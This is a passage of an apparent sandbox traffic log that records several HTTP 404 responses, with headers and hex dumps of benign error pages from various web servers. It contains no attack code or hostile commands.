7c 23 d7 b3 7f 35 f3 75 57 8c c2 69 82 7e 3f ed 75 6c 72 69 6f 63 57 52 de 72 64 7e 22 d4 af 93 b8 0f 2b 37 29 6f c8 7c 47 12 06 70 f4 83 2b 85 e9 9b 2b 53 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 c3 5e 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 7a 44 50 a3 37 06 af 98 f8 1c c5 af 71 ed 23 43 fd 82 1a eb f8 c6 36 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b 3d e0 53 77 90 d5 55 19 82 80 d0 7f bc b1 df 1b f2 95 bb 9b 60 fc 1d 5e 57 fd 6f d2 02 9e e2 f0 86 2d 2f ce 7a ff ea 23 e3 fb 1d 2e 96 36 e3 d0 07 46 b6 c1 09 c1 2d de c6 df 48 7e bd f1 9b 17 d0 7f b4 d3 25 e1 82 1c f5 59 0c eb 03 c1 7d 98 98 fe ad 19 bf 0b f5 69 ec bd 2c ed 4f 39 20 41 dd ca d7 e7 dc f6 25 3f 5a 59 ec bc 49 d1 eb f1 5a ca 1f 75 d0 66 85 73 6f 01 8c 44 20 47 f5 7f ee cd 38 7e 4f e0 97 a4 02 49 1d 80 7b 00 74 05 b2 c4 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 13:17:55 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 d4 fb 59 96 69 47 7e d1 cb 00 4c 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e0 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 a2 67 95 5b dc e8 c3 09 cb 3c 36 81 2e ac 38 b3 a3 ff 83 ed be f6 f8 33 81 46 6e 77 7a 66 f2 3e 76 3d a0 25 b3 ae b2 f7 9b bd 0c 17 cf 5a fc 71 fc 4d f6 01 8a 5c 5b e0 4d d2 af 00 91 79 96 96 ee 7d 98 7a d9 8d a0 af 7a 65 2f ed 6d ef ab e5 65 65 56 75 09 ac e3 b8 37 8b 2f a8 79 36 ff 10 41 fe e5 8f 56 17 ae 59 66 e9 e7 eb b1 e1 f5 fa 1e 92 9f 99 e0 8a b3 8b 4e ed ea 22 d7 97 ef 96 05 f2 f6 7b dd f7 81 e2 66 c3 57 69 91 4b fb 90 df 1e 4b 3d 30 80 e3 7d a0 ae 2b b4 16 6e ee 9a c0 66 20 8c 3c ff 7c 23 d7 b3 7f 35 f3 75 57 8c c2 69 82 7e 3f ed 75 6c 72 69 6f 63 57 52 de 72 64 7e 22 d4 af 93 b8 0f 2b 37 29 6f c8 7c 47 12 06 70 f4 83 2b 85 e9 9b 2b 53 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 c3 5e 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 7a 44 50 a3 37 06 af 98 f8 1c c5 af 71 ed 23 43 fd 82 1a eb f8 c6 36 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b 3d e0 53 77 90 d5 55 19 82 80 d0 7f bc b1 df 1b f2 95 bb 9b 60 fc 1d 5e 57 fd 6f d2 02 9e e2 f0 86 2d 2f ce 7a ff ea 23 e3 fb 1d 2e 96 36 e3 d0 07 46 b6 c1 09 c1 2d de c6 df 48 7e bd f1 9b 17 d0 7f b4 d3 25 e1 82 1c f5 59 0c eb 03 c1 7d 98 98 fe ad 19 bf 0b f5 69 ec bd 2c ed 4f 39 20 41 dd ca d7 e7 dc f6 25 3f 5a 59 ec bc 49 d1 eb f1 5a ca 1f 75 d0 66 85 73 6f 01 8c 44 20 47 f5 7f ee cd 38 7e 4f e0 97 a4 02 49 1d 80 7b 00 74 05 b2 c4 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Thu, 24 Oct 2024 13:17:58 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 46 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 13:18:03 GMTContent-Type: text/htmlContent-Length: 520Connection: closeETag: "6632e438-208"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 e9 94 9b e5 b1 be e5 81 8d e7 92 87 e9 94 8b e7 9c b0 e9 90 a8 e5 8b ac e6 9e 83 e6 b5 a0 e6 9c b5 e7 ac 89 e7 80 9b e6 a8 ba e6 b9 aa 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 13:18:06 GMTContent-Type: text/htmlContent-Length: 520Connection: closeETag: "6632e438-208"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 e9 94 9b e5 b1 be e5 81 8d e7 92 87 e9 94 8b e7 9c b0 e9 90 a8 e5 8b ac e6 9e 83 e6 b5 a0 e6 9c b5 e7 ac 89 e7 80 9b e6 a8 ba e6 b9 aa 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 13:18:09 GMTContent-Type: text/htmlContent-Length: 520Connection: closeETag: "6632e438-208"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 e9 94 9b e5 b1 be e5 81 8d e7 92 87 e9 94 8b e7 9c b0 e9 90 a8 e5 8b ac e6 9e 83 e6 b5 a0 e6 9c b5 e7 ac 89 e7 80 9b e6 a8 ba e6 b9 aa 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 13:18:11 GMTContent-Type: text/htmlContent-Length: 520Connection: closeETag: "6632e438-208"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 e9 94 9b e5 b1 be e5 81 8d e7 92 87 e9 94 8b e7 9c b0 e9 90 a8 e5 8b ac e6 9e 83 e6 b5 a0 e6 9c b5 e7 ac 89 e7 80 9b e6 a8 ba e6 b9 aa 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:18:17 GMTServer: ApacheX-Powered-By: PHP/8.2.23Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 37 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 63 6f 62 61 31 36 38 20 e0 b8 aa e0 b8 a5 e0 b9 87 e0 b8 ad e0 b8 95 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 a3 e0 b8 a7 e0 b8 a1 e0 b9 80 e0 b8 81 e0 b8 a1 e0 b8 84 e0 b8 b8 e0 b8 93 e0 b8 a0 e0 b8 b2 e0 b8 9e e0 b8 88 e0 b8 b2 e0 b8 81 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 e0 b8 94 e0 b8 b1 e0 b8 87 20 e0 b9 81 e0 b8 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 68 5f 54 48 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 63 6f 62 61 31 36 38 20 e0 b8 aa e0 b8 a5 e0 b9 87 e0 b8 ad e0 b8 95 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 a3 e0 b8 a7 e0 b8 a1 e0 b9 80 e0 b8 81 e0 b8 a1 e0 b8 84 e0 b8 b8 e0 b8 93 e0 b8 a0 e0 b8 b2 e0 b8 9e e0 b8 88 e0 b8 b2 e0 b8 81 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 e0 b8 94 e0 b8 b1 e0 b8 87 20 e0 b9 81 e0 b8 Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><me
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:18:20 GMTServer: ApacheX-Powered-By: PHP/8.2.23Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 